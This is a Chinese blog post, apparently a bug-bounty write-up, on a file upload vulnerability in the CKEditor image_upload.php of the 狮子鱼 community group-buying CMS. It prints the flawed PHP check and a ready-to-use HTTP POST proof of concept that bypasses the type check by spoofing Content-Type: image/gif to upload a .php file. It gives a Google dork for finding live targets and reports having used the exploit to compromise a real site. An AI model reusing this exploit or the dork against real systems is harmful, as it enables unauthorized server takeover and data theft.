SRC上分 - 某CMS存在文件上传漏洞

漏洞分析

网站系统为狮子鱼社区团购系统，漏洞文件为CK编辑器的image_upload.php，漏洞源码如下所示：

 $max_size) { // 判断文件大小是否大于500000字节
    echo '{"result":"400","msg":"上传图片太大，最大支持：'.($max_size/1024).'KB"}';
    exit ();
  }
  if (! in_array ( $file ['type'], $arrType )) { // 判断图片文件的格式
    echo '{"result":"400","msg":"上传图片格式不对"}';
    exit ();
  }
  if (! file_exists ( $upfile )) { // 判断存放文件目录是否存在
    mkdir ( $upfile, 0777, true );
  }
  $imageSize = getimagesize ( $file ['tmp_name'] );
  $img = $imageSize [0] . '*' . $imageSize [1];
  $fname = $file ['name'];
  $ftype = explode ( '.', $fname );
  $time = explode ( " ", microtime () );
  $time = $time [1] . ($time [0] * 1000);
  $time2 = explode ( ".", $time );  
  $time = $time2 [0];
  $returnName=$time."." .end($ftype);
  $picName = $upfile . "/" . $returnName ;

  if (! move_uploaded_file ( $file ['tmp_name'], $picName )) {
    echo '{"result":"400","msg":"从:'.$file ['tmp_name'].'移动图片到:'.$picName.'出错"}';
    exit ();
  } else {
    echo '{"result":"200","imgurl":"image/uploads/' . $returnName . '"}';
  }
}
?>

略读一下，可以得出这样一个信息，限制文件类型以及大小。
那么有没有可能绕过呢？
使用Content-Type: image/gif即可绕过并上传PHP文件
POC如下所示：

POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1
Host: 这里填目标网站的域名
Content-Length: 202
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="files"; filename="vulbox1.php"
Content-Type: image/gif


------WebKitFormBoundary8UaANmWAgM4BqBSs

实战

谷歌语法：inurl:/seller.php?s=/Public/login

利用上述poc改包后，上传

尝试访问返回路径，解析成功

拿下

END

炒冷饭罢辽